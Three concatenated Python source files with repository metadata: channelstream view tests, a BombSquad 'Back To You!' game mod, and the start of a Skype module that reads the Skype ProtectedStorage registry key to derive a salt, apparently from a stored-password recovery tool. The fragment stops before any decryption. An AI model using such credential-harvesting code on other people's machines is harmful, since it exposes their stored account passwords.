def _connect_user(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
def test_not_found_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
dummy_request.json_body = {"user": "blabla"}
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
user_state(dummy_request)
assert excinfo.value.messages == {"user": ["Unknown user"]}
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
self._connect_user(dummy_request, test_uuids)
dummy_request.json_body = {
"user": "test",
"user_state": {"bar": 2, "private": "im_private"},
"state_public_keys": ["avatar", "bar"],
}
result = user_state(dummy_request)
sorted_keys = sorted(["bar", "key", "private"])
assert sorted_keys == sorted(result["user_state"].keys())
assert result["user_state"]["private"] == "im_private"
sorted_changed = sorted([x["key"] for x in result["changed_state"]])
assert result["public_keys"] == ["avatar", "bar"]
assert sorted_changed == sorted(["bar", "private"])
def test_good_json_no_public_keys(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import user_state
self._connect_user(dummy_request, test_uuids)
dummy_request.json_body = {
"user": "test",
"user_state": {"bar": 2, "private": "im_private"},
}
result = user_state(dummy_request)
sorted_keys = sorted(["bar", "key", "private"])
assert sorted_keys == sorted(result["user_state"].keys())
assert result["user_state"]["private"] == "im_private"
assert result["public_keys"] == ["bar"]
sorted_changed = sorted([x["key"] for x in result["changed_state"]])
assert sorted_changed == sorted(["bar", "private"])
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestSubscribeViews(object):
def test_bad_json(self, dummy_request):
from channelstream.wsgi_views.server import subscribe
dummy_request.json_body = {}
try:
subscribe(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert list(sorted(exc.messages.keys())) == ["channels", "conn_id"]
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, subscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {
"conn_id": str(test_uuids[1]),
"channels": ["b"],
"channel_configs": {
"a": {"notify_presence": True},
"b": {"notify_presence": True},
},
}
result = subscribe(dummy_request)
assert sorted(result["channels"]) == sorted(["a", "aB", "b"])
assert result["channels_info"]["users"] == [
{"state": {"bar": "baz", "key": "foo"}, "user": "test"}
]
assert "a" in result["channels_info"]["channels"]
assert "b" in result["channels_info"]["channels"]
assert result["channels_info"]["channels"]["a"]["total_connections"] == 1
assert result["channels_info"]["channels"]["a"]["total_users"] == 1
assert result["channels_info"]["channels"]["a"]["history"] == []
assert result["channels_info"]["channels"]["a"]["users"] == ["test"]
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestUnsubscribeViews(object):
def test_bad_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import unsubscribe
dummy_request.json_body = {}
try:
unsubscribe(dummy_request)
except marshmallow.exceptions.ValidationError as exc:
assert list(sorted(exc.messages.keys())) == ["channels", "conn_id"]
def test_good_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, unsubscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB", "aC"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {
"conn_id": str(test_uuids[1]),
"channels": ["aC", "a"],
}
result = unsubscribe(dummy_request)
assert sorted(result["channels"]) == sorted(["aB"])
def test_non_existing_channel(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, unsubscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB", "aC"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {"conn_id": str(test_uuids[1]), "channels": ["d"]}
result = unsubscribe(dummy_request)
assert sorted(result["channels"]) == sorted(["a", "aB", "aC"])
def test_no_channels(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, unsubscribe
dummy_request.json_body = {
"username": "test",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {"conn_id": str(test_uuids[1]), "channels": ["a"]}
result = unsubscribe(dummy_request)
assert len(result["channels"]) == 0
assert result["channels_info"]["users"] == []
assert result["channels_info"]["channels"] == {}
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestInfoView(object):
def test_empty_json(self, dummy_request):
from channelstream.wsgi_views.server import info
dummy_request.json_body = {}
result = info(dummy_request)
assert result["channels"] == {}
assert result["users"] == []
def test_subscribed_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, info
dummy_request.json_body = {
"username": "test1",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz"},
"state_public_keys": ["bar"],
"channels": ["a", "aB"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {
"username": "test2",
"conn_id": test_uuids[2],
"fresh_user_state": {"key": "foo1"},
"user_state": {"bar": "baz1"},
"state_public_keys": ["key"],
"channels": ["a", "c"],
"channel_configs": {"c": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = {}
result = info(dummy_request)
assert sorted(("a", "aB", "c")) == sorted(result["channels"].keys())
assert result["users"]
comp_a = sorted(result["channels"]["a"]["users"])
comp_b = sorted(["test1", "test2"])
assert comp_a == comp_b
assert result["channels"]["a"]["total_users"] == 2
assert result["channels"]["a"]["total_connections"] == 2
assert result["channels"]["c"]["users"] == ["test2"]
assert result["channels"]["c"]["total_users"] == 1
assert result["channels"]["c"]["total_connections"] == 1
assert result["channels"]["aB"]["users"] == ["test1"]
comp_a = sorted(result["users"], key=lambda x: x["user"])
comp_b = sorted(
[
{"state": {"bar": "baz", "key": "foo"}, "user": "test1"},
{"state": {"bar": "baz1", "key": "foo1"}, "user": "test2"},
],
key=lambda x: x["user"],
)
assert comp_a == comp_b
dummy_request.body = "NOTEMPTY"
dummy_request.json_body = {"info": {"channels": ["a"]}}
result = info(dummy_request)
assert "a" in result["channels"]
assert "aB" not in result["channels"]
def test_detailed_json(self, dummy_request, test_uuids):
from channelstream.wsgi_views.server import connect, info, message
dummy_request.json_body = {
"username": "test1",
"conn_id": str(test_uuids[1]),
"fresh_user_state": {"key": "foo"},
"user_state": {"bar": "baz", "private": "p1"},
"state_public_keys": ["bar"],
"channels": ["a", "aB", "c", "D"],
"channel_configs": {"a": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
dummy_request.json_body = [
{
"type": "message",
"user": "test1",
"channel": "a",
"message": {"text": "test"},
}
]
message(dummy_request)
gevent.sleep(0)
dummy_request.body = "value"
dummy_request.json_body = {
"info": {
"exclude_channels": ["c"],
"include_history": False,
"include_users": True,
"return_public_state": True,
"include_connections": True,
}
}
result = info(dummy_request)
assert sorted(result["channels"].keys()) == sorted(["a", "aB", "D"])
assert "private" not in result["users"][0]["state"]
assert len(result["channels"]["a"]["history"]) == 0
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestMessageViews(object):
def test_empty_json(self, dummy_request):
from channelstream.wsgi_views.server import message
server_state = get_state()
dummy_request.json_body = {}
assert server_state.stats["total_unique_messages"] == 0
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
message(dummy_request)
assert excinfo.value.messages == {"_schema": ["Invalid input type."]}
def test_good_json_no_channel(self, dummy_request):
from channelstream.wsgi_views.server import message
server_state = get_state()
channel = Channel("test")
channel.store_history = True
server_state.channels[channel.name] = channel
msg_payload = {
"type": "message",
"user": "system",
"channel": "test",
"message": {"text": "test"},
}
dummy_request.json_body = [msg_payload]
assert server_state.stats["total_unique_messages"] == 0
assert len(channel.history) == 0
message(dummy_request)
# change context
gevent.sleep(0)
assert server_state.stats["total_unique_messages"] == 1
assert len(channel.history) == 1
msg = channel.history[0]
assert msg["uuid"] is not None
assert msg["user"] == msg_payload["user"]
assert msg["message"] == msg_payload["message"]
assert msg["type"] == msg_payload["type"]
assert msg["channel"] == msg_payload["channel"]
assert msg["timestamp"] is not None
def test_catchup_messages(self, dummy_request):
from channelstream.wsgi_views.server import message, connect
server_state = get_state()
dummy_request.json_body = {
"username": "test1",
"channels": ["test"],
"channel_configs": {"test": {"store_history": True, "history_size": 2}},
}
connect(dummy_request)
msg_payload = {
"type": "message",
"user": "system",
"channel": "test",
"message": {"text": "test3"},
}
dummy_request.json_body = [msg_payload]
message(dummy_request)
# add pm message to non-existing user
wrong_user_msg_payload = {
"type": "message",
"user": "system",
"channel": "test",
"message": {"text": "test1"},
"pm_users": ["test2"],
}
msg_payload = {
"type": "message",
"user": "system",
"channel": "test",
"message": {"text": "test2"},
"pm_users": ["test1"],
}
dummy_request.json_body = [wrong_user_msg_payload, msg_payload]
message(dummy_request)
# change context
gevent.sleep(0)
connection = server_state.users["test1"].connections[0]
messages = connection.get_catchup_messages()
assert len(messages) == 2
assert messages[0]["timestamp"] > connection.last_active
assert messages[0]["message"]["text"] == "test3"
assert messages[1]["timestamp"] > connection.last_active
assert messages[1]["message"]["text"] == "test2"
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestMessageEditViews(object):
def test_empty_json(self, dummy_request):
from channelstream.wsgi_views.server import message
dummy_request.json_body = {}
with pytest.raises(marshmallow.exceptions.ValidationError) as excinfo:
message(dummy_request)
assert excinfo.value.messages == {"_schema": ["Invalid input type."]}
def test_good_json_no_channel(self, dummy_request):
from channelstream.wsgi_views.server import message, messages_patch
server_state = get_state()
channel = Channel("test")
channel.store_history = True
server_state.channels[channel.name] = channel
msg_payload = {"user": "system", "channel": "test", "message": {"text": "test"}}
dummy_request.json_body = [msg_payload]
message(dummy_request)
# change context
gevent.sleep(0)
msg = channel.history[0]
assert msg["message"] == msg_payload["message"]
edit_payload = {
"uuid": msg["uuid"],
"user": "edited_system",
"channel": "test",
"timestamp": "2010-01-01T01:01",
"edited": "2010-01-01T01:02",
"message": {"text": "edited_message"},
}
dummy_request.json_body = [edit_payload]
response = messages_patch(dummy_request)[0]
gevent.sleep(0)
assert msg["user"] == response["user"]
assert msg["message"] == response["message"]
assert msg["edited"] == response["edited"]
assert msg["timestamp"] == response["timestamp"]
frame = channel.frames[0][1]
assert id(frame) == id(msg)
assert frame["user"] == response["user"]
assert frame["message"] == response["message"]
assert frame["edited"] == response["edited"]
assert frame["timestamp"] == response["timestamp"]
class TestMessageDeleteViews(object):
def test_empty_json(self, dummy_request):
from channelstream.wsgi_views.server import messages_delete
dummy_request.json_body = []
result = messages_delete(dummy_request)
assert result == []
def test_good_json_no_channel(self, dummy_request):
from channelstream.wsgi_views.server import message, messages_delete
server_state = get_state()
channel = Channel("test")
channel.store_history = True
server_state.channels[channel.name] = channel
msg_payload = {"user": "system", "channel": "test", "message": {"text": "test"}}
dummy_request.json_body = [msg_payload]
message(dummy_request)
# change context
gevent.sleep(0)
msg = channel.history[0]
assert msg["message"] == msg_payload["message"]
dummy_request.json_body = [{"uuid": str(msg["uuid"]), "channel": "test"}]
response = messages_delete(dummy_request)
gevent.sleep(0)
assert response[0]["uuid"] == msg["uuid"]
assert len(channel.history) == 0
assert len(channel.frames) == 1
assert channel.frames[0][1]["type"] == "message:delete"
@pytest.mark.usefixtures("cleanup_globals", "pyramid_config")
class TestChannelConfigView(object):
def test_empty_json(self, dummy_request):
from channelstream.wsgi_views.server import channel_config
dummy_request.json_body = {}
result = channel_config(dummy_request)
assert result["channels"] == {}
assert result["users"] == []
def test_valid_json(self, dummy_request):
from channelstream.wsgi_views.server import channel_config
dummy_request.json_body = {
"chanx1": {
"notify_presence": True,
"store_history": True,
"history_size": 3,
"broadcast_presence_with_user_lists": True,
"notify_state": True,
"store_frames": False,
}
}
result = channel_config(dummy_request)
channel_settings = result["channels"]["chanx1"]["settings"]
assert channel_settings["notify_presence"] is True
assert channel_settings["store_history"] is True
assert channel_settings["history_size"] == 3
assert channel_settings["broadcast_presence_with_user_lists"] is True
assert channel_settings["notify_state"] is True
assert channel_settings["store_frames"] is False
|
AppEnlight/channelstream
|
tests/tests_views.py
|
Python
|
bsd-3-clause
| 21,292 | 0.00108 |
import bs
import random
import bsUtils
#import PlayerSpaz
def bsGetAPIVersion():
# see bombsquadgame.com/apichanges
return 4
def bsGetGames():
return [BackToYou]
class Icon(bs.Actor):
def __init__(self,player,position,scale,showLives=True,showDeath=True,
nameScale=1.0,nameMaxWidth=115.0,flatness=1.0,shadow=1.0):
bs.Actor.__init__(self)
self._player = player
self._showLives = showLives
self._showDeath = showDeath
self._nameScale = nameScale
self._outlineTex = bs.getTexture('characterIconMask')
icon = player.getIcon()
self.node = bs.newNode('image',
owner=self,
attrs={'texture':icon['texture'],
'tintTexture':icon['tintTexture'],
'tintColor':icon['tintColor'],
'vrDepth':400,
'tint2Color':icon['tint2Color'],
'maskTexture':self._outlineTex,
'opacity':1.0,
'absoluteScale':True,
'attach':'bottomCenter'})
self._nameText = bs.newNode('text',
owner=self.node,
attrs={'text':player.getName(),
'color':bs.getSafeColor(player.getTeam().color),
'hAlign':'center',
'vAlign':'center',
'vrDepth':410,
'maxWidth':nameMaxWidth,
'shadow':shadow,
'flatness':flatness,
'hAttach':'center',
'vAttach':'bottom'})
if self._showLives:
self._livesText = bs.newNode('text',
owner=self.node,
attrs={'text':'x0',
'color':(1,1,0.5),
'hAlign':'left',
'vrDepth':430,
'shadow':1.0,
'flatness':1.0,
'hAttach':'center',
'vAttach':'bottom'})
self.setPositionAndScale(position,scale)
def setPositionAndScale(self,position,scale):
self.node.position = position
self.node.scale = [70.0*scale]
self._nameText.position = (position[0],position[1]+scale*52.0)
self._nameText.scale = 1.0*scale*self._nameScale
if self._showLives:
self._livesText.position = (position[0]+scale*10.0,position[1]-scale*43.0)
self._livesText.scale = 1.0*scale
def updateForLives(self):
if self._player.exists():
lives = self._player.gameData['lives']
else: lives = 0
if self._showLives:
if lives > 0: self._livesText.text = 'x'+str(lives-1)
else: self._livesText.text = ''
if lives == 0:
myAct = self._player.actor.getActivity()
if self._player in myAct.winners:
if myAct.winners[0] == self._player:
self._livesText.text = "1st"
elif myAct.winners[1] == self._player:
self._livesText.text = "2nd"
elif myAct.winners[2] == self._player:
self._livesText.text = "3rd"
else:
self._nameText.opacity = 0.2
self.node.color = (0.7,0.3,0.3)
self.node.opacity = 0.2
def handlePlayerSpawned(self):
if not self.node.exists(): return
self.node.opacity = 1.0
self.updateForLives()
def handlePlayerDied(self):
if not self.node.exists(): return
if self._showDeath:
bs.animate(self.node,'opacity',{0:1.0,50:0.0,100:1.0,150:0.0,200:1.0,250:0.0,
300:1.0,350:0.0,400:1.0,450:0.0,500:1.0,550:0.2})
lives = self._player.gameData['lives']
if lives == 0: bs.gameTimer(600,self.updateForLives)
class PlayerSpaz_BTY(bs.PlayerSpaz):
def handleMessage(self, m):
if isinstance(m, bs.HitMessage):
if not self.node.exists():
return
if not self.isAlive():
return #We don't want to be hitting corpses!
srcSpaz = None
theGame = self.getActivity()
for theSpaz in theGame.spazList:
if theSpaz.getPlayer() == m.sourcePlayer:
srcSpaz = theSpaz
break
#print(["HitSrc", srcSpaz])
#print(["hitSpaz", self])
if not srcSpaz == self:
if not srcSpaz == None:
#We need to calculate new position for hit. Otherwise it won't
#actually hit the source spaz if he's across the screen
p1 = m.pos
p2 = self.node.position
p3 = srcSpaz.node.position
hit2spaz = [p2[0]-p1[0],p2[1]-p1[1], p2[2]-p1[2]]
m.pos = [p3[0]-hit2spaz[0], p3[1]-hit2spaz[1], p3[2]-hit2spaz[2]]
m.sourcePlayer = self.getPlayer()
#print(['sroucenode', m.srcNode])
#print(['pos', m.pos])
#print(['velocity', m.velocity])
#print(['magnitude',m.magnitude])
#print(['vMag', m.velocityMagnitude])
#print(['radisu', m.radius])
#print([m.sourcePlayer])
#print(['kickback', m.kickBack])
#print(['flat', m.flatDamage])
#print(['hittype', m.hitType])
#print(['forcedir', m.forceDirection])
#print(['Hitsubtype', m.hitSubType])
super(srcSpaz.__class__, srcSpaz).handleMessage(m)
#if isinstance(m, bs.ImpactDamageMessage):
#print(["impact", m.intensity])
#super(self.__class__, self).handleMessage(m)
else:
super(self.__class__, self).handleMessage(m)
class BackToYou(bs.TeamGameActivity):
@classmethod
def getName(cls):
return 'Back To You!'
@classmethod
def getScoreInfo(cls):
return {'scoreName':'Survived',
'scoreType':'seconds',
'noneIsWinner':False,
'lowerIsBetter':True}
@classmethod
def getDescription(cls,sessionType):
return 'Damage others to kill yourself! First one out wins!'
@classmethod
def supportsSessionType(cls,sessionType):
return True if (issubclass(sessionType,bs.TeamsSession)
or issubclass(sessionType,bs.FreeForAllSession)) else False
@classmethod
def getSupportedMaps(cls,sessionType):
return bs.getMapsSupportingPlayType("melee")
@classmethod
def getSettings(cls,sessionType):
settings = [("Lives Per Player",{'default':1,'minValue':1,'maxValue':10,'increment':1}),
("Time Limit",{'choices':[('None',0),('1 Minute',60),
('2 Minutes',120),('5 Minutes',300),
('10 Minutes',600),('20 Minutes',1200)],'default':0}),
("Respawn Times",{'choices':[('Shorter',0.25),('Short',0.5),('Normal',1.0),('Long',2.0),('Longer',4.0)],'default':1.0}),
("Epic Mode",{'default':False})]
if issubclass(sessionType,bs.TeamsSession):
settings.append(("Solo Mode",{'default':False}))
settings.append(("Balance Total Lives",{'default':False}))
return settings
def __init__(self,settings):
bs.TeamGameActivity.__init__(self,settings)
if self.settings['Epic Mode']: self._isSlowMotion = True
# show messages when players die since it's meaningful here
self.announcePlayerDeaths = True
try: self._soloMode = settings['Solo Mode']
except Exception: self._soloMode = False
self._scoreBoard = bs.ScoreBoard()
self.spazList = []
self.winners = []
def getInstanceDescription(self):
return 'First team out wins.' if isinstance(self.getSession(),bs.TeamsSession) else 'Damage others to kill yourself! First one out wins!'
def getInstanceScoreBoardDescription(self):
return 'first team out wins' if isinstance(self.getSession(),bs.TeamsSession) else 'Damage others to kill yourself! First one out wins!'
def onTransitionIn(self):
bs.TeamGameActivity.onTransitionIn(self, music='Epic' if self.settings['Epic Mode'] else 'Survival')
self._startGameTime = bs.getGameTime()
def onTeamJoin(self,team):
team.gameData['survivalSeconds'] = None
team.gameData['spawnOrder'] = []
def onPlayerJoin(self, player):
player.gameData['lives'] = self.settings['Lives Per Player']
if self._soloMode:
player.gameData['icons'] = []
player.getTeam().gameData['spawnOrder'].append(player)
self._updateSoloMode()
else:
# create our icon and spawn
player.gameData['icons'] = [Icon(player,position=(0,50),scale=0.8)]
if player.gameData['lives'] > 0:
self.spawnPlayer(player)
# dont waste time doing this until begin
if self.hasBegun():
self._updateIcons()
def _updateSoloMode(self):
# for both teams, find the first player on the spawn order list with lives remaining
# and spawn them if they're not alive
for team in self.teams:
# prune dead players from the spawn order
team.gameData['spawnOrder'] = [p for p in team.gameData['spawnOrder'] if p.exists()]
for player in team.gameData['spawnOrder']:
if player.gameData['lives'] > 0:
if not player.isAlive(): self.spawnPlayer(player)
break
def _updateIcons(self):
# in free-for-all mode, everyone is just lined up along the bottom
if isinstance(self.getSession(),bs.FreeForAllSession):
count = len(self.teams)
xOffs = 85
x = xOffs*(count-1) * -0.5
for i,team in enumerate(self.teams):
if len(team.players) == 1:
player = team.players[0]
for icon in player.gameData['icons']:
icon.setPositionAndScale((x,30),0.7)
icon.updateForLives()
x += xOffs
# in teams mode we split up teams
else:
if self._soloMode:
# first off, clear out all icons
for player in self.players:
player.gameData['icons'] = []
# now for each team, cycle through our available players adding icons
for team in self.teams:
if team.getID() == 0:
x = -60
xOffs = -78
else:
x = 60
xOffs = 78
isFirst = True
testLives = 1
while True:
playersWithLives = [p for p in team.gameData['spawnOrder'] if p.exists() and p.gameData['lives'] >= testLives]
if len(playersWithLives) == 0: break
for player in playersWithLives:
player.gameData['icons'].append(Icon(player,
position=(x,(40 if isFirst else 25)),
scale=1.0 if isFirst else 0.5,
nameMaxWidth=130 if isFirst else 75,
nameScale=0.8 if isFirst else 1.0,
flatness=0.0 if isFirst else 1.0,
shadow=0.5 if isFirst else 1.0,
showDeath=True if isFirst else False,
showLives=False))
x += xOffs * (0.8 if isFirst else 0.56)
isFirst = False
testLives += 1
# non-solo mode
else:
for team in self.teams:
if team.getID() == 0:
x = -50
xOffs = -85
else:
x = 50
xOffs = 85
for player in team.players:
for icon in player.gameData['icons']:
icon.setPositionAndScale((x,30),0.7)
icon.updateForLives()
x += xOffs
def _getSpawnPoint(self,player):
# in solo-mode, if there's an existing live player on the map, spawn at whichever
# spot is farthest from them (keeps the action spread out)
if self._soloMode:
livingPlayer = None
for team in self.teams:
for player in team.players:
if player.isAlive():
p = player.actor.node.position
livingPlayer = player
livingPlayerPos = p
break
if livingPlayer:
playerPos = bs.Vector(*livingPlayerPos)
points = []
for team in self.teams:
startPos = bs.Vector(*self.getMap().getStartPosition(team.getID()))
points.append([(startPos-playerPos).length(),startPos])
points.sort()
return points[-1][1]
else:
return None
else:
return None
def spawnPlayer(self,player):
"""This next line is the default spawn line. But we need to spawn our special guy"""
#self.spawnPlayerSpaz(player,self._getSpawnPoint(player))
#position = self._getSpawnPoint(player)
#if isinstance(self.getSession(), bs.TeamsSession):
# position = self.getMap().getStartPosition(player.getTeam().getID())
#else:
# # otherwise do free-for-all spawn locations
position = self.getMap().getFFAStartPosition(self.players)
angle = 20
#spaz = self.spawnPlayerSpaz(player)
# lets reconnect this player's controls to this
# spaz but *without* the ability to attack or pick stuff up
#spaz.connectControlsToPlayer(enablePunch=False,
# enableBomb=False,
# enablePickUp=False)
# also lets have them make some noise when they die..
#spaz.playBigDeathSound = True
name = player.getName()
lightColor = bsUtils.getNormalizedColor(player.color)
displayColor = bs.getSafeColor(player.color, targetIntensity=0.75)
spaz = PlayerSpaz_BTY(color=player.color,
highlight=player.highlight,
character=player.character,
player=player)
player.setActor(spaz)
#For some reason, I can't figure out how to get a list of all spaz.
#Therefore, I am making the list here so I can get which spaz belongs
#to the player supplied by HitMessage.
self.spazList.append(spaz)
# we want a bigger area-of-interest in co-op mode
# if isinstance(self.getSession(),bs.CoopSession): spaz.node.areaOfInterestRadius = 5.0
# else: spaz.node.areaOfInterestRadius = 5.0
# if this is co-op and we're on Courtyard or Runaround, add the material that allows us to
# collide with the player-walls
# FIXME; need to generalize this
if isinstance(self.getSession(), bs.CoopSession) and self.getMap().getName() in ['Courtyard', 'Tower D']:
mat = self.getMap().preloadData['collideWithWallMaterial']
spaz.node.materials += (mat,)
spaz.node.rollerMaterials += (mat,)
spaz.node.name = name
spaz.node.nameColor = displayColor
spaz.connectControlsToPlayer()
self.scoreSet.playerGotNewSpaz(player, spaz)
# move to the stand position and add a flash of light
spaz.handleMessage(bs.StandMessage(position, angle if angle is not None else random.uniform(0, 360)))
t = bs.getGameTime()
bs.playSound(self._spawnSound, 1, position=spaz.node.position)
light = bs.newNode('light', attrs={'color': lightColor})
spaz.node.connectAttr('position', light, 'position')
bsUtils.animate(light, 'intensity', {0: 0, 250: 1, 500: 0})
bs.gameTimer(500, light.delete)
#Start code to spawn special guy:
#End of code to spawn special guy
if not self._soloMode:
bs.gameTimer(300,bs.Call(self._printLives,player))
# if we have any icons, update their state
for icon in player.gameData['icons']:
icon.handlePlayerSpawned()
def _printLives(self,player):
if not player.exists() or not player.isAlive(): return
try: pos = player.actor.node.position
except Exception,e:
print 'EXC getting player pos in bsElim',e
return
bs.PopupText('x'+str(player.gameData['lives']-1),color=(1,1,0,1),
offset=(0,-0.8,0),randomOffset=0.0,scale=1.8,position=pos).autoRetain()
def onPlayerLeave(self,player):
bs.TeamGameActivity.onPlayerLeave(self,player)
player.gameData['icons'] = None
if player in self.winners:
self.winners.remove(player)
# remove us from spawn-order
if self._soloMode:
if player in player.getTeam().gameData['spawnOrder']:
player.getTeam().gameData['spawnOrder'].remove(player)
# update icons in a moment since our team will be gone from the list then
bs.gameTimer(0, self._updateIcons)
def onBegin(self):
bs.TeamGameActivity.onBegin(self)
self.setupStandardTimeLimit(self.settings['Time Limit'])
self.setupStandardPowerupDrops()
if self._soloMode:
self._vsText = bs.NodeActor(bs.newNode("text",
attrs={'position':(0,105),
'hAttach':"center",
'hAlign':'center',
'maxWidth':200,
'shadow':0.5,
'vrDepth':390,
'scale':0.6,
'vAttach':"bottom",
'color':(0.8,0.8,0.3,1.0),
'text':bs.Lstr(resource='vsText')}))
# if balance-team-lives is on, add lives to the smaller team until total lives match
if (isinstance(self.getSession(),bs.TeamsSession)
and self.settings['Balance Total Lives']
and len(self.teams[0].players) > 0
and len(self.teams[1].players) > 0):
if self._getTotalTeamLives(self.teams[0]) < self._getTotalTeamLives(self.teams[1]):
lesserTeam = self.teams[0]
greaterTeam = self.teams[1]
else:
lesserTeam = self.teams[1]
greaterTeam = self.teams[0]
addIndex = 0
while self._getTotalTeamLives(lesserTeam) < self._getTotalTeamLives(greaterTeam):
lesserTeam.players[addIndex].gameData['lives'] += 1
addIndex = (addIndex + 1) % len(lesserTeam.players)
self._updateIcons()
# we could check game-over conditions at explicit trigger points,
# but lets just do the simple thing and poll it...
bs.gameTimer(1000, self._update, repeat=True)
def _getTotalTeamLives(self,team):
return sum(player.gameData['lives'] for player in team.players)
def handleMessage(self,m):
if isinstance(m,bs.PlayerSpazDeathMessage):
bs.TeamGameActivity.handleMessage(self, m) # augment standard behavior
player = m.spaz.getPlayer()
respawnPoints = None
print([player, m.spaz.hitPoints, "killed by", m.killerPlayer])
if m.killerPlayer is None:
pass #Don't take away a life for non-violent death
elif m.killerPlayer == m.spaz.getPlayer():
pass #No credit for suicide!
elif m.spaz.hitPoints > 0: #Spaz died, but had positive hit points. Probably fell. Take points from player.
#tossing or knocking off a player respawns them w/o taking life.
print([player, "died from fall.", m.spaz.hitPoints])
pass
else:
player.gameData['lives'] -= 1
#Remove this spaz from the list of active spazzes
if m.spaz in self.spazList: self.spazList.remove(m.spaz)
if player.gameData['lives'] < 0:
bs.printError('Got lives < 0 in Elim; this shouldnt happen. solo:'+str(self._soloMode))
player.gameData['lives'] = 0
# if we have any icons, update their state
for icon in player.gameData['icons']:
icon.handlePlayerDied()
# play big death sound on our last death or for every one in solo mode
if self._soloMode or player.gameData['lives'] == 0:
bs.playSound(bs.Spaz.getFactory().singlePlayerDeathSound)
# if we hit zero lives, we're dead (and our team might be too)
if player.gameData['lives'] == 0:
# if the whole team is now dead, mark their survival time..
#if all(teammate.gameData['lives'] == 0 for teammate in player.getTeam().players):
if self._getTotalTeamLives(player.getTeam()) == 0:
player.getTeam().gameData['survivalSeconds'] = (bs.getGameTime()-self._startGameTime)/1000
self.winners.append(player)
else:
# otherwise, in regular mode, respawn..
if not self._soloMode:
self.respawnPlayer(player)
# in solo, put ourself at the back of the spawn order
if self._soloMode:
player.getTeam().gameData['spawnOrder'].remove(player)
player.getTeam().gameData['spawnOrder'].append(player)
else:
bs.TeamGameActivity.handleMessage(self, m)
def _update(self):
if self._soloMode:
# for both teams, find the first player on the spawn order list with lives remaining
# and spawn them if they're not alive
for team in self.teams:
# prune dead players from the spawn order
team.gameData['spawnOrder'] = [p for p in team.gameData['spawnOrder'] if p.exists()]
for player in team.gameData['spawnOrder']:
if player.gameData['lives'] > 0:
if not player.isAlive():
self.spawnPlayer(player)
self._updateIcons()
break
# if we're down to 1 or fewer living teams, start a timer to end the game
# (allows the dust to settle and draws to occur if deaths are close enough)
if (len(self._getLivingTeams()) < 2) or len(self.winners) > 2:
self._roundEndTimer = bs.Timer(500,self.endGame)
def _getLivingTeams(self):
return [team for team in self.teams if len(team.players) > 0 and any(player.gameData['lives'] > 0 for player in team.players)]
def endGame(self):
if self.hasEnded(): return
results = bs.TeamGameResults()
self._vsText = None # kill our 'vs' if its there
for team in self.teams:
results.setTeamScore(team, team.gameData['survivalSeconds'])
self.end(results=results)
|
Mrmaxmeier/BombSquad-Community-Mod-Manager
|
mods/BackToYou.py
|
Python
|
unlicense
| 25,208 | 0.012734 |
from Crypto.Cipher import AES
import xml.etree.cElementTree as ET
import win32con, win32api, win32crypt
import base64, hashlib, os
import binascii, struct
from config.constant import *
from config.write_output import print_output, print_debug
from config.header import Header
from config.moduleInfo import ModuleInfo
from config.dico import get_dico
class Skype(ModuleInfo):
def __init__(self):
options = {'command': '-s', 'action': 'store_true', 'dest': 'skype', 'help': 'skype'}
ModuleInfo.__init__(self, 'skype', 'chats', options)
def aes_encrypt(self, message, passphrase):
IV = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
aes = AES.new(passphrase, AES.MODE_CBC, IV)
return aes.encrypt(message)
# get value used to build the salt
def get_regkey(self):
try:
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Skype\\ProtectedStorage'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return ''
